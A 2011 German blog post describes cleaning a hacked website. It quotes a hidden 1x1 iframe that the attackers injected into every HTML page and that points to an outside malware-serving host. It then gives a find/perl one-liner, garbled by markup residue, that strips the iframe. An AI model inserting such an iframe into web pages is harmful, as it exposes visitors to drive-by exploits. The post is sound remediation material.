Webseite kompromittiert – mit Perl schnell repariert

21 November 2011 Kein Kommentar Autor: Jürgen (jdo)
Malware auf der Webseite

Malware auf der Webseite

Ich habe einen Anruf bekommen, dass eine Webseite eine Virenwarnung bringt und bei Google und anderen Anbietern auf schwarzen Listen gelandet ist. Also Gummizelle (VirtualBox) angeworfen, die Seite besucht und den Quellcode angesehen. Stimm, die Seite liefert Malware aus (sieben Exploits). Folgender Code wurde eingepflanzt: <iframe src=“http://zarulem.com.tw/6000/index.php“ width=“1″ height=“1″></iframe> (NICHT BESUCHEN DIE SEITE – NUR AUF EIGENE GEFAHR !!!) – bei einem Besuch wird man auf Google umgeleitet.

Eigentlich kein Problem, weil man den Eintrag einfach rausnehmen kann. Dumm ist nur, dass die Seite mit was auch immer erstellt wurde und etliche HTML-Dateien und Unterverzeichnisse enthält. Auf jeder Unterseite war natürlich der lästige iframe eingebettet. Entweder man kruscht sich nun durch den ganzen Wust und räumt manuell auf, oder man macht das ganze im Nerd-Stil. In meinem Fall Linux und Perl.

Da es sich immer um den selben Eintrag handelte sucht und ersetzt man in den HTML-Dateien einfach rekursiv:

  1. span class="st0">"*.html"'s/<iframe src=\"http:\/\/zarulem\.com\.tw\/6000\/index.php\" width=\"1\" height=\"1\"><\/iframe>//g;' {} \;

Du kannst gerne Deinen Senf zu diesem Beitrag geben: Hier geht es zu den Kommentaren




Schreiben macht durstig! Eine kleine Erfrischung kann daher nie schaden. Wem dieser freie Artikel gefallen hat, der darf mir gerne einen frisch gezapften Hopfen-Tee ausgeben (Paypal - der Spenden-Knopf
oder bitcoin - Adresse: 1NacVNwcLLePUVv8uSafu5Ykdwh8QyDfgK). Ich freue mich über jede noch so kleine Spende. Vielen Dank und Prost!
 Alle Kommentare als Feed abonnieren

Antworten